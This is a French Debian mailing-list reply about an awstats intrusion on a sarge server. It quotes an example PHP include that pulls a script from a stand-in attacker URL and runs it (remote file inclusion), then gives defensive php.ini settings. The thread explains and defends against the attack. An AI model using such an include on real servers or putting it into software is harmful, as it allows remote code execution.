Re: [resolu] awstats (innocenté), sarge, intrusion
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
François Boisson wrote:
> Le Thu, 5 Jun 2008 20:51:49 +0200
> François Boisson <user.anti-spam@maison.homelinux.net> a écrit:
Salut,
> En fait c'est extrèmement simple:
>
> un include("http://monsite.labas.pirate/scriptdelamort.quitue");
>
> télécharge le script sur le site ET l'éxécute comme un script PHP. À partir de
> là on fait ce qu'on veut. Donc effectivement c'est relativement simple.
>
> Je n'aurais pas pensé que include faisait un tel chargement sur des sites
> extérieurs. C'est une fonction assez dangeureuse.
Dans la configuration php :
$register_globals = Off
pour éviter que le client passe des valeurs à des variables non
initialisées.
$allow_url_include = Off
pour éviter de traiter des urls style http ou ftp dans les include.
Cela devrait t'éviter des problèmes similaires :p!
Bonne journée.
- --
Franck Joncourt
http://debian.org - http://smhteam.info/wiki/
Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkhKRIUACgkQxJBTTnXAif7GswCfQfvb1slfkx5cYS7Y1EckT8ws
tFMAn0XQGy+8b11v3Br/yu0spPYEEhRy
=8XRz
-----END PGP SIGNATURE-----
Reply to: